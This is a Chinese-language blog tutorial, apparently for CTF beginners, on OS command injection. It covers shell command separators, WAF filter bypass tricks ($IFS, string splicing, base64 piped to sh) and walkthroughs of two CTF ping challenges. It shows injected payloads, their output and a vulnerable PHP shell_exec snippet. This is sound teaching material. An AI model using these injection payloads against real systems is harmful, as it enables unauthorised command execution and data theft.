WEB入门——命令连接与绕过

最新推荐文章于 2024-05-06 10:59:29 发布
最新推荐文章于 2024-05-06 10:59:29 发布
阅读量136 收藏
点赞数
分类专栏: CTF入门 文章标签: 前端 linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HasntStartIsOver/article/details/130950252
版权

命令连接

一、常见连接命令

1.1 Windows 下连接两条命令

命令符合说明使用
|直接执行后面的语句ping www.baidu.com | whoani
||如果前面的语句执行错误,则执行后面的语句ping 2 || whoami
&前面的语句可真可假ping 2 & whoami
&&前面的语句为真时,才执行后面的语句ping www.baid.com && whoami
C:\Users\Administrator>ping baidu.com | whoami
user-20230324oe\administrator

C:\Users\Administrator>ping baidu.com || whoami

正在 Ping baidu.com [110.242.68.66] 具有 32 字节的数据:
来自 110.242.68.66 的回复: 字节=32 时间=37ms TTL=50
Cuser-20230324oe\administrator

C:\Users\Administrator>ping 2 || whoami 
正在 Ping 0.0.0.2 具有 32 字节的数据:
PING:传输失败。常见故障。  
user-20230324oe\administrator

C:\Users\Administrator>ping 2 & whoami

正在 Ping 0.0.0.2 具有 32 字节的数据:
PING:传输失败。常见故障。 
user-20230324oe\administrator

C:\Users\Administrator>ping baidu.com & whoami

正在 Ping baidu.com [110.242.68.66] 具有 32 字节的数据:
来自 110.242.68.66 的回复: 字节=32 时间=37ms TTL=50 
Cuser-20230324oe\administrator

C:\Users\Administrator>ping baidu.com && whoami

正在 Ping baidu.com [110.242.68.66] 具有 32 字节的数据:
来自 110.242.68.66 的回复: 字节=32 时间=37ms TTL=50 
user-20230324oe\administrator

C:\Users\Administrator>ping 2 && whoami

正在 Ping 0.0.0.2 具有 32 字节的数据:
PING:传输失败。常见故障。

1.2 Linux 下连接两条命令

命令符合说明使用
|管道符,直接执行后面的语句ping -c 4 127.0.0.1 | whoani
||如果前面的语句执行错误,则执行后面的语句ping -c 4 2 || whoami
;执行完前面的,直接执行后面的ping -c 4 127.0.0.1 & whoami
&&前面的语句为真时,才执行后面的语句ping -c 4 127.0.0.1 && whoami
┌──(root㉿192)-[~]
└─ ping -c 4 127.0.0.1 ; whoami
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.083 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.058 ms

--- 127.0.0.1 ping statistics ---
4 packets transmitted, 2 received, 50% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.058/0.070/0.083/0.012 ms
root
                                                                                                                                        
┌──(root㉿192)-[~]
└─ ping -c 4 127.0.0.1 | whoami
root
                                                                                                                                        
┌──(root㉿192)-[~]
└─ ping -c 4 127.0.0 || whoami 
PING 127.0.0 (127.0.0.0) 56(84) bytes of data.
64 bytes from 127.0.0.0: icmp_seq=2 ttl=64 time=0.085 ms
64 bytes from 127.0.0.0: icmp_seq=3 ttl=64 time=0.091 ms
64 bytes from 127.0.0.0: icmp_seq=4 ttl=64 time=0.082 ms

--- 127.0.0 ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.082/0.086/0.091/0.003 ms
                                                                                                                                        
┌──(root㉿192)-[~]
└─ ping -c 4 127 || whoami 
PING 127 (0.0.0.127) 56(84) bytes of data.
From 192.168.15.132 icmp_seq=1 Destination Host Unreachable
From 192.168.15.132 icmp_seq=2 Destination Host Unreachable
From 192.168.15.132 icmp_seq=3 Destination Host Unreachable
From 192.168.15.132 icmp_seq=4 Destination Host Unreachable

--- 127 ping statistics ---
4 packets transmitted, 0 received, +4 errors, 100% packet loss, time 2997ms
pipe 4
root
                                                                                                                                        
┌──(root㉿192)-[~]
└─ ping -c 4 127.0.0.1 && whoami
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.057 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.064 ms

--- 127.0.0.1 ping statistics ---
4 packets transmitted, 2 received, 50% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.057/0.060/0.064/0.003 ms
root

1.3 CTF练习

  • [ACTF2020 新生赛]Exec
    在这里插入图片描述
  • 尝试输入 baidu.com | ls,很顺利的就拿到了index.php,所以本题好像没有什么过滤规则。
    在这里插入图片描述
  • 继续查看index.php文件。baidu.com|cat index.php。虽然页面显示了两个PING输入框,但是查看源码,发现下面多了一段PHP代码。
    在这里插入图片描述
  • flag不在当前目录下,继续寻找flag,baidu.com | ls …/… ,目录下依旧没有。 baidu.com | ls …/…/… 找找到了flag文件。最后baidu.com | cat …/…/…/flag 查看内容。
    在这里插入图片描述

二、绕过

有时候会碰到,WAF过滤了一些关键字或者空格。这时候需要我们避开这些关键字或空格。

2.1 空格绕过

  • $IFS$1 :内部域分隔符

    $0        Shell本身的文件名
$1$n 	  添加到Shell的各参数值。$1是第1参数、$2是第2参数…
$$        Shell本身的PID(ProcessID) 
$!        Shell最后运行的后台Process的PID
$?        上个命令的退出状态,或函数的返回值 $- 使用Set命令设定的Flag一览
$*        所有参数列表,不包括脚本本身。如"$*"用「"」括起来的情况、以"$1 $2$n"的形式输出所有数。
$@        所有参数列表。如"$@"用「"」括起来的情况、以"$1" "$2""$n" 的形式输出所有参数。
$#        Shell的参数个数

  • {cat,flag}

  • cat<flag

  • cat<>flag

    ┌──(root㉿192)-[~/桌面/zaxiang]
└─ cat<flag  
flag{akdjfweifjklajsdf}
                                                                                                                                       
┌──(root㉿192)-[~/桌面/zaxiang]
└─ cat<>flag
flag{akdjfweifjklajsdf}

2.2 关键词绕过

  • 变量拼接

    ┌──(root㉿192)-[~/桌面/zaxiang]
└─ a=fl;b=ag;cat $a$b         
flag{akdjfweifjklajsdf}

  • 反应号

    ┌──(root㉿192)-[~/桌面/zaxiang]
└─ cat fl`fjlajsdfj`ag
fjlajsdfj:未找到命令
flag{akdjfweifjklajsdf}

  • 反斜杠

    ┌──(root㉿192)-[~/桌面/zaxiang]
└─ cat fl\            
> ag                
flag{akdjfweifjklajsdf}

  • 引号

    ┌──(root㉿192)-[~/桌面/zaxiang]
└─ cat fl'a'g
flag{akdjfweifjklajsdf}

  • 编码绕过

    ──(root㉿192)-[~/桌面/zaxiang]
└─ echo Y2F0IGZsYWc=|base64 -d|sh   #  Y2F0IGZsYWc= 是 cat flag 的base64编码
flag{akdjfweifjklajsdf}

2.4 CTF 练习

  • [GXYCTF2019]Ping Ping Ping
    在这里插入图片描述

  • 打开题目连接,就是上面的界面,提交 /?ip=baidu.com|ls。显示在当前目录下有flag.php和index.php。
    在这里插入图片描述

  • 输入baidu.com|cat flag.php,发现服务器识别了空格。于是输入baidu.com|cat<>flag.php ,服务器也识别了符号。
    在这里插入图片描述

  • 尝试使用$IFS 命令绕过空格,结果flag被过滤了。那我们先看看index.php的内容
    在这里插入图片描述

  • baidu.com|cat$IFS$1index.php 得到index.php的内容。

    <?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}
?>

  • 分析index.php的内容,可以知道过滤了&、<、>、*、{、}、(、)等,试着用编码绕过。

    baidu.com|echo$IFS$1Y2F0ICBmbGFnLnBocA==|base64$IFS$1-d|sh

    在这里插入图片描述

HasntStartIsOver
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Web入门项目源码分享——记账本
03-27
分享一个适合入门Web项目--记账本,这个是女朋友某天一句话,说给她写一个简单的记账本。 编程语言:Java+Jsp+html。 适合人群:想入门学习Web项目。 能学到什么:JSP+Servlet模式,servlet层中有方法,实现和...
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2171
ctfshow的命令执行(web72-77)
[ctfshow]web入门——命令执行(web54-web71)
ShenZ的博客
12-01 3924
文章目录web54 web54
CTFshow—web入门——命令执行
h_adam的博客
10-07 2791
web入门——命令执行web29功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 web29 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客
CTFshow web入门——命令执行
小元砸的博客
01-29 9537
web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);
CTFSHOW WEB入门——命令执行
Chur的博客
10-09 1138
ctfshow 靶场 web入门 命令执行系列
ctfshow-web入门——命令执行(2)(web41-web57)
m0_62905745的博客
03-16 914
本篇文章是ctfshow的web入门部分的命令执行部分wp(web41-web 57),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
ctfshow-web入门——命令执行(1)(web29-web40)
m0_62905745的博客
03-16 814
本篇文章是ctfshow的web入门部分的命令执行部分wp(web29-web 40),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
CTFshow web入门——文件上传
小元砸的博客
03-14 9850
Web 151
CTFshow——web入门——sql注入
h_adam的博客
03-14 5352
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
[ctfshow]web入门——命令执行(web40-web53)
ShenZ的博客
11-29 1113
文章目录web40 web40 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: [email protected] # @link: https://ctfer.com */ if(isset($_GET['c'])){ $
Web编程入门——字节跳动.pptx
08-24
Web编程入门——字节跳动.pptx
web前端基础——CSS入门
01-20
web前端基础——CSS入门 1.css的引入方式 内部样式: 直接在style里面写 内联样式: 外部样式表 2.css选择器 id选择器: #id名{} Hello World! #para1 { text-align:center; color:red; } ID属性不要以...
Web系统大规模并发——电商秒杀与抢购
02-25
在过去的工作中,我曾经面对过5w每秒的高并发秒杀功能,在这个过程中,整个Web系统遇到了很多的问题和挑战。如果Web系统不做针对性的优化,会轻而易举地陷入到异常状态。我们现在一起来讨论下,优化的思路和方法哈。...
Web编程入门——字节跳动.zip
10-25
Web编程入门——字节跳动
Web】CTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1605
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
50个前端实战项目之04:隐藏的搜索小组件
前端开发博客
05-03 1077
大家好,我是宝哥。今天讲50个前端实战项目之04:隐藏的搜索小组件。源码下载地址https://github.com/bradtraversy/50projects50days/tree/master/hidden-search前端实战项目系列正在更新:04/5001:可展开卡片02:进度条03:旋转导航动画04:隐藏的搜索小组件项目介绍本项目演示了一个简洁实用的隐藏式搜索小部件。点击搜索按钮后,...
使用IIS部署Vue项目
最新发布
weixin_44656422的博客
05-06 447
使用IIS部署Vue项目,后端必须跨域,不要在Vue中用proxy跨域,那个只在dev环境中有用!IIS安装,不用全部打勾,有些他默认就是方块 ■ 选择性安装的,就维持原样就可以。
web server apache tomcat11-32-rewrite
05-06 809
整理这个官方翻译的系列,原因是网上大部分的 tomcat 版本比较旧,此版本为 v11 最新的版本。重写阀门实现了 URL 重写功能,与 Apache HTTP Server 中的 mod_rewrite 非常相似。
web命令执行常见绕过方式
07-10
6. 操作系统命令绕过:通过绕过操作系统命令执行的限制,如使用操作系统特定的命令命令的变体、命令替换等。 7. 文件扩展名绕过:通过伪装文件扩展名或使用特殊的文件扩展名来绕过文件上传过滤器,从而执行恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值